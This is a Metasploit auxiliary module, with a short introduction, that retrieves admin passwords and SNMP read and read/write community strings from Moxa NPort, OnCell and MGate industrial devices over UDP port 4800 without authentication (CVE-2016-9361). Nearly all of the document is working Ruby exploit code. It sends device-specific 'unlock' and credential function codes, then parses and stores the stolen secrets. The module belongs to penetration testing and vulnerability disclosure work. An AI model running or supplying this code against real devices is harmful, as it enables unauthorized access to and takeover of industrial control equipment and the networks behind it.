The Moxa protocol listens on 4800/UDP and will respond to broadcast or direct traffic. The service is known to be used on Moxa devices in the NPort, OnCell, and MGate product lines. Many devices with firmware versions older than 2017 or late 2016 allow admin credentials and SNMP read and read/write community strings to be retrieved without authentication. This Metasploit module is the work of Patrick DeSantis of Cisco Talos and K. Reid Wightman. Tested on: Moxa NPort 6250 firmware v1.13, MGate MB3170 firmware 2.5, and NPort 5110 firmware 2.6.
993fe76383658c80bcdb06cee32dc9d065dae5ecbd2b15061a1c670b3fa96e6d##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Moxa Device Credential Retrieval',
'Description' => %q{
The Moxa protocol listens on 4800/UDP and will respond to broadcast
or direct traffic. The service is known to be used on Moxa devices
in the NPort, OnCell, and MGate product lines. Many devices with
firmware versions older than 2017 or late 2016 allow admin credentials
and SNMP read and read/write community strings to be retrieved without
authentication.
This module is the work of Patrick DeSantis of Cisco Talos and K. Reid
Wightman.
Tested on: Moxa NPort 6250 firmware v1.13, MGate MB3170 firmware 2.5,
and NPort 5110 firmware 2.6.
},
'Author' =>
[
'Patrick DeSantis <p[at]t-r10t.com>',
'K. Reid Wightman <reid[at]revics-security.com>'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2016-9361'],
[ 'BID', '85965'],
[ 'URL', 'https://www.digitalbond.com/blog/2016/10/25/serial-killers/'],
[ 'URL', 'https://github.com/reidmefirst/MoxaPass/blob/master/moxa_getpass.py' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-336-02']
],
'DisclosureDate' => '2015-07-28'))
register_options([
# Moxa protocol listens on 4800/UDP by default
Opt::RPORT(4800),
OptEnum.new("FUNCTION", [true, "Pull credentials or enumerate all function codes", "CREDS",
[
"CREDS",
"ENUM"
]])
])
end
def fc() {
# Function codes
'ident' => "\x01", # identify device
'name' => "\x10", # get the "server name" of the device
'netstat' => "\x14", # network activity of the device
'unlock1' => "\x16", # "unlock" some devices, including 5110, MGate
'date_time' => "\x1a", # get the device date and time
'time_server' => "\x1b", # get the time server of device
'unlock2' => "\x1e", # "unlock" 6xxx series devices
'snmp_read' => "\x28", # snmp community strings
'pass' => "\x29", # admin password of some devices
'all_creds' => "\x2c", # snmp comm strings and admin password of 6xxx
'enum' => "enum" # mock fc to catch "ENUM" option
}
end
def send_datagram(func, tail)
if fc[func] == "\x01"
# identify datagrams have a length of 8 bytes and no tail
datagram = fc[func] + "\x00\x00\x08\x00\x00\x00\x00"
begin
udp_sock.put(datagram)
response = udp_sock.get(3)
rescue ::Timeout::Error
end
format_output(response)
# the last 16 bytes of the ident response are used as a form of auth for
# function codes other than 0x01
tail = response[8..24]
elsif fc[func] == "enum"
for i in ("\x02".."\x80") do
# start at 2 since 0 is invalid and 1 is ident
datagram = i + "\x00\x00\x14\x00\x00\x00\x00" + tail
begin
udp_sock.put(datagram)
response = udp_sock.get(3)
end
if response[1] != "\x04"
vprint_status("Function Code: #{Rex::Text.to_hex_dump(datagram[0])}")
format_output(response)
end
end
else
# all non-ident datagrams have a len of 14 bytes and include a tail that
# is comprised of bytes obtained during the ident
datagram = fc[func] + "\x00\x00\x14\x00\x00\x00\x00" + tail
begin
udp_sock.put(datagram)
response = udp_sock.get(3)
if valid_resp(fc[func], response) == -1
# invalid response, so don't bother trying to parse it
return
end
if fc[func] == "\x2c"
# try this, note it may fail
get_creds(response)
end
if fc[func] == "\x29"
# try this, note it may fail
get_pass(response)
end
if fc[func] == "\x28"
# try this, note it may fail
get_snmp_read(response)
end
rescue ::Timeout::Error
end
format_output(response)
end
end
# helper function for extracting strings from payload
def get_string(data)
str_end = data.index("\x00")
return data[0..str_end]
end
# helper function for extracting password from 0x29 FC response
def get_pass(response)
if response.length() < 200
print_error("get_pass failed: response not long enough")
return
end
pass = get_string(response[200..-1])
print_good("password retrieved: #{pass}")
store_loot("moxa.get_pass.admin_pass", "text/plain", rhost, pass)
return pass
end
# helper function for extracting snmp community from 0x28 FC response
def get_snmp_read(response)
if response.length() < 24
print_error("get_snmp_read failed: response not long enough")
return
end
snmp_string = get_string(response[24..-1])
print_good("snmp community retrieved: #{snmp_string}")
store_loot("moxa.get_pass.snmp_read", "text/plain", rhost, snmp_string)
end
# helper function for extracting snmp community from 0x2C FC response
def get_snmp_write(response)
if response.length() < 64
print_error("get_snmp_write failed: response not long enough")
return
end
snmp_string = get_string(response[64..-1])
print_good("snmp read/write community retrieved: #{snmp_string}")
store_loot("moxa.get_pass.snmp_write", "text/plain", rhost, snmp_string)
end
# helper function for extracting snmp and pass from 0x2C FC response
# Note that 0x2C response is basically 0x28 and 0x29 mashed together
def get_creds(response)
if response.length() < 200
# attempt failed. device may not be unlocked
print_error("get_creds failed: response not long enough. Will fall back to other functions")
return -1
end
get_snmp_read(response)
get_snmp_write(response)
get_pass(response)
end
# helper function to verify that the response was actually for our request
# Simply makes sure the response function code has most significant bit
# of the request number set
# returns 0 if everything is ok
# returns -1 if functions don't match
def valid_resp(func, resp)
# get the query function code to an integer
qfc = func.unpack("C")[0]
# make the response function code an integer
rfc = resp[0].unpack("C")[0]
if rfc == (qfc + 0x80)
return 0
else
return -1
end
end
def format_output(resp)
# output response bytes as hexdump
vprint_status("Response:\n#{Rex::Text.to_hex_dump(resp)}")
end
def check
connect_udp
begin
# send the identify command
udp_sock.put("\x01\x00\x00\x08\x00\x00\x00\x00")
response = udp_sock.get(3)
end
if response
# A valid response is 24 bytes, starts with 0x81, and contains the values
# 0x00, 0x90, 0xe8 (the Moxa OIU) in bytes 14, 15, and 16.
if response[0] == "\x81" && response[14..16] == "\x00\x90\xe8" && response.length == 24
format_output(response)
return Exploit::CheckCode::Appears
end
else
vprint_error("Unknown response")
return Exploit::CheckCode::Unknown
end
cleanup
Exploit::CheckCode::Safe
end
def run
unless check == Exploit::CheckCode::Appears
print_error("Aborted because the target does not seem vulnerable.")
return
end
function = datastore["FUNCTION"]
connect_udp
# identify the device and get bytes for the "tail"
tail = send_datagram('ident', nil)
# get the "server name" from the device
send_datagram('name', tail)
# "unlock" the device
# We send both versions of the unlock FC, this doesn't seem
# to hurt anything on any devices tested
send_datagram('unlock1', tail)
send_datagram('unlock2', tail)
if function == "CREDS"
# grab data
send_datagram('all_creds', tail)
send_datagram('snmp_read', tail)
send_datagram('pass', tail)
elsif function == "ENUM"
send_datagram('enum', tail)
else
print_error("Invalid FUNCTION")
end
disconnect_udp
end
end
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